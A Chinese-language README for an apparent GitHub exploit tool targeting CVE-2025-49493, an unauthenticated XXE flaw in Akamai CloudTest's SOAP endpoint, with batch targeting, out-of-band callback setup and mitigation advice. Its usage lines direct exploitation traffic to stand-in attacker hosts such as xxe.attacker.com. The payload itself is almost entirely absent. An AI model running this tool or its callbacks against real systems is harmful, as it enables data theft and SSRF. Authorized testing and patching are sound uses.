SystemVll/CVE-2025-49493

# Akamai CloudTest XXE Exploit (CVE-2025-49493) ## 概述 这是一个基于 Python 的 **CVE-2025-49493** exploit，该漏洞影响 60 2025.06.02 (12988) 之前的 Akamai CloudTest 版本。该漏洞允许通过 SOAP service endpoint 进行 XML External Entity (XXE) 注入。 ## 漏洞详情 - **CVE ID**: CVE-2025-49493 - **漏洞类型**: XML External Entity (XXE) Injection - **严重程度**: Critical (CVSS 9.1) - **受影响软件**: Akamai CloudTest - **受影响版本**: 60 2025.06.02 (12988) 之前 - **攻击向量**: Network - **需要身份验证**: 否 ## 技术细节 该漏洞存在于 `/concerto/services/RepositoryService` SOAP endpoint 中，该处在处理 XML 输入时未对外部实体进行适当的清理。攻击者可以构造恶意的 XML payload 来触发 XXE 攻击，这可能导致： - 信息泄露 - SSRF (Server-Side Request Forgery) - 拒绝服务 - 在某些配置下潜在的 RCE ## 功能 - **目标发现**: 自动识别 Akamai CloudTest 实例 - **漏洞检测**: 检查是否存在易受攻击的 endpoint 和特征 - **XXE 利用**: 发送带有 XXE payload 的构造 SOAP 请求 - **多目标支持**: 支持从目标文件进行批处理 - **详细日志**: 带有时间戳的全面彩色日志记录 - **错误处理**: 针对 Network 问题提供强大的错误处理机制 ## 安装 ### 前置条件 - Python 3.6 或更高版本 - pip package manager ### 依赖项 安装所需的 package： ``` pip install -r requirements.txt ``` 或手动安装： ``` pip install requests urllib3 colored pyfiglet ``` ## 用法 ### 基本用法 ``` python main.py targets.txt xxe.attacker.com ``` ### 进阶用法 ``` # 使用自定义 timeout python main.py targets.txt collaborator.burp.com --timeout 20 # 使用 interactsh 进行 OOB 检测 python main.py targets.txt attacker.interactsh.com ``` ### 命令行选项 ``` positional arguments: targets Target file containing list of Akamai CloudTest hosts xxe_server XXE server to capture requests (e.g., attacker.com or IP) optional arguments: -h, --help show this help message and exit --timeout TIMEOUT Request timeout in seconds (default: 10) ``` ## 目标文件格式 创建一个 `targets.txt` 文件，每行一个目标： ``` https://example-cloudtest.akamai.com https://demo-cloudtest.example.com https://test-cloudtest.internal.company.com https://cloudtest.example.org ``` ## 设置 XXE 服务器 ### 选项 1: 使用 Burp Collaborator 1. 打开 Burp Suite Professional 2. 转到 Burp > Burp Collaborator client 3. 点击“Copy to clipboard”获取你的 collaborator URL 4. 将此 URL 用作 xxe_server 参数 ### 选项 2: 使用 Interactsh 1. 安装 interactsh: `go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest` 2. 运行: `interactsh-client` 3. 将提供的 URL 用作 xxe_server 参数 ### 选项 3: 自定义 HTTP Server 设置一个简单的 HTTP server 来捕获请求： ``` # simple_server.py import http.server import socketserver class RequestHandler(http.server.SimpleHTTPRequestHandler): def do_GET(self): print(f"XXE Request received: {self.path}") print(f"Headers: {self.headers}") super().do_GET() with socketserver.TCPServer(("", 8000), RequestHandler) as httpd: print("Server running on port 8000") httpd.serve_forever() ``` ## 利用流程 1. **目标验证**: 验证 URL 格式和可访问性 2. **漏洞检测**: - 检查响应中的 CloudTest 指标 - 验证 SOAP service endpoint 是否存在 3. **XXE Payload 生成**: 创建带有 XXE 的恶意 SOAP envelope 4. **漏洞利用**: 将构造好的请求发送至易受攻击的 endpoint 5. **结果分析**: 分析响应以获取成功指标 ## XXE Payload 结构 此 exploit 使用以下 XXE payload 结构： ``` ]> &xxe; ``` ## 缓解措施 ### 对于管理员 1. **立即采取的行动**: - 将 Akamai CloudTest 更新至 60 2025.06.02 或更高版本 - 监控日志以发现可疑的 XML 处理活动 - 实施 Network 分段以限制暴露 2. **长期解决方案**: - 在 XML parser 中禁用 XML external entity 处理 - 实施输入验证和清理 - 对 XML 处理使用允许列表 - 定期进行安全评估 ### 对于开发者 1. **安全的 XML 处理**: # 在 XML parsers 中禁用 external entities import xml.etree.ElementTree as ET parser = ET.XMLParser() parser.parser.DefaultHandler = lambda data: None parser.parser.ExternalEntityRefHandler = lambda *args: False 2. **输入验证**: - 根据严格的 schema 验证所有 XML 输入 - 在 XML 处理前清理用户可控的数据 - 实施适当的错误处理 ## 参考 - [xbow 的原始研究](https://xbow.com/blog/xbow-akamai-cloudtest-xxe/) - [Akamai CloudTest 更新日志](https://techdocs.akamai.com/cloudtest/changelog/june-2-2025-enhancements-and-bug-fixes) - [CVE-2025-49493 详情](https://nvd.nist.gov/vuln/detail/CVE-2025-49493) - [OWASP XXE 预防](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing) ## 法律免责声明 此工具仅用于教育和授权测试目的。用户在测试任何系统之前，有责任确保已获得适当的授权。作者不对因使用此工具而造成的任何滥用或损害负责。 ## 许可证 该项目在 MIT 许可证下授权——有关详细信息，请参阅 LICENSE 文件。 ## 作者 - **原始研究**: xbow, 3th1c_yuk1 - **Exploit 开发**: Security Research Team - **CVE 分配**: CVE-2025-49493 ## 更新日志 ### v1.0.0 - 初始版本 - 基础的 XXE 漏洞利用功能 - 目标文件支持 - 全面的日志记录 - 错误处理改进

标签：Python, XXE攻击, XXE注入, 无后门, 逆向工具